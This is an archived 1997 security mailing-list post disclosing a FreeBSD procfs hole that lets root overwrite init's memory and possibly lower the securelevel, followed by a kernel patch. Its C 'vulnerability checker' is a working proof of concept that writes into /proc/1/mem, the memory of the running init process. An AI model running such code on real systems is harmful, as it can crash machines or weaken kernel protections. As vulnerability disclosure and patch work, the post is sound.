From owner-freebsd-security Fri Sep 5 23:55:17 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id XAA28380 for security-outgoing; Fri, 5 Sep 1997 23:55:17 -0700 (PDT) Received: from apocalypse.saturn.net (user9482@apocalypse.saturn.net [208.192.215.27]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id XAA28373 for ; Fri, 5 Sep 1997 23:55:12 -0700 (PDT) Received: from localhost (brian@localhost) by apocalypse.saturn.net (8.8.5/8.8.5) with SMTP id CAA00174; Sat, 6 Sep 1997 02:53:27 -0400 (EDT) Date: Sat, 6 Sep 1997 02:53:25 -0400 (EDT) From: Brian Mitchell To: freebsd-security@freebsd.org cc: bugtraq@netspace.org Subject: procfs take II Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk There is a slight procfs hole that could allow a intruder to lower the securelevel. init's memory is not protected, so you can overwrite data/instructions in init and possibly lower the securelevel (although panicing the system is much more likely). Enclosed is a vulnerbility checker: #include #include #include #include #include main() { int tqbf=31337; int fd; int g0nz0; if(getuid()) { fprintf(stderr, "this attack needs root\n"); exit(1); } fd = open("/proc/1/mem", O_RDWR); if(fd < 0) { fprintf(stderr, "open of /proc/1/mem failed\n"); exit(2); } lseek(fd, 0x1000, SEEK_SET); g0nz0=write(fd, &tqbf, sizeof(int)); close(fd); if(g0nz0 >= 0) fprintf(stderr, "procfs is vulnerable!\n"); else fprintf(stderr, "procfs is not vulnerable!\n"); printf("returned %d\n", g0nz0); } Here is a simple patch, it disallows writes to pid 1's mem node if securelevel is > 0 (diff is based on 2.2.1 box with the securelevel fix applied): *** procfs_mem.c Sat Sep 6 02:36:39 1997 --- procfs_mem.c.new Sat Sep 6 02:38:25 1997 *************** *** 316,321 **** --- 316,325 ---- !(curp->p_cred->pc_ucred->cr_gid == KMEM_GROUP && uio->uio_rw == UIO_READ)) return EPERM; + + /* writing to init memory while securelevel > 0 is bad */ + if(uio->uio_rw == UIO_WRITE && p->p_pid == 1 && securelevel > 0) + return EPERM; error = procfs_rwmem(p, uio); Brian Mitchell brian@firehouse.net "BSD code sucks. Of course, everything else sucks far more." - Theo de Raadt (OpenBSD President)